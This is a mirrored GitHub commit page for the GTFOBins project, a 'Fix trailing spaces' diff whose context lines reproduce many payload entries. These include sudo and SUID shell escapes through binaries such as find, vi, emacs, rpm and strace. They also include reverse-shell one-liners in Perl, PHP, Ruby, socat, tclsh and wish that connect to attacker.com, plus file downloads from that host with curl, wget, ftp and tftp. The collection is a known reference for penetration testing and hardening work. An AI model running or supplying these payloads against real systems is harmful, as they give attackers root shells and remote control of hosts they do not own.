mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
Fix trailing spaces
This commit is contained in:
Andrea Cardaci
parent
2b4fbed8a6
commit
f0d72ff530
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo ash
|
||||
suid-enabled:
|
||||
- code: ./ash
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo csh
|
||||
suid-enabled:
|
||||
- code: ./csh -b
|
||||
---
|
||||
---
|
||||
|
||||
@ -12,4 +12,4 @@ functions:
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=where_to_save
|
||||
curl $URL -o $LFILE
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo env /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./env /bin/sh -p
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
---
|
||||
---
|
||||
|
||||
@ -20,4 +20,4 @@ functions:
|
||||
RHOST=attacker.com
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ionice /bin/sh -p
|
||||
---
|
||||
---
|
||||
|
||||
@ -12,4 +12,4 @@ functions:
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
---
|
||||
---
|
||||
|
||||
@ -35,6 +35,6 @@ functions:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
||||
---
|
||||
|
||||
@ -17,4 +17,4 @@ functions:
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
load-library:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
---
|
||||
---
|
||||
|
||||
@ -4,11 +4,11 @@ functions:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
||||
bind-shell:
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
---
|
||||
---
|
||||
|
||||
@ -14,8 +14,8 @@ functions:
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||
---
|
||||
---
|
||||
|
||||
@ -32,5 +32,5 @@ functions:
|
||||
./telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
|
||||
|
||||
---
|
||||
|
||||
@ -12,4 +12,4 @@ functions:
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
---
|
||||
---
|
||||
|
||||
@ -10,4 +10,4 @@ functions:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
suid-enabled:
|
||||
- code: ./vi -c ':!/bin/sh -p'
|
||||
---
|
||||
---
|
||||
|
||||
@ -12,4 +12,4 @@ functions:
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
wget $URL -O $LFILE
|
||||
---
|
||||
---
|
||||
|
||||
@ -10,8 +10,8 @@ functions:
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
|
||||
---
|
||||
---
|
||||
|
||||
@ -6,4 +6,4 @@ functions:
|
||||
- code: sudo zsh
|
||||
suid-enabled:
|
||||
- code: ./zsh
|
||||
---
|
||||
---
|
||||
|
||||
Loading…
Reference in New Issue
Block a user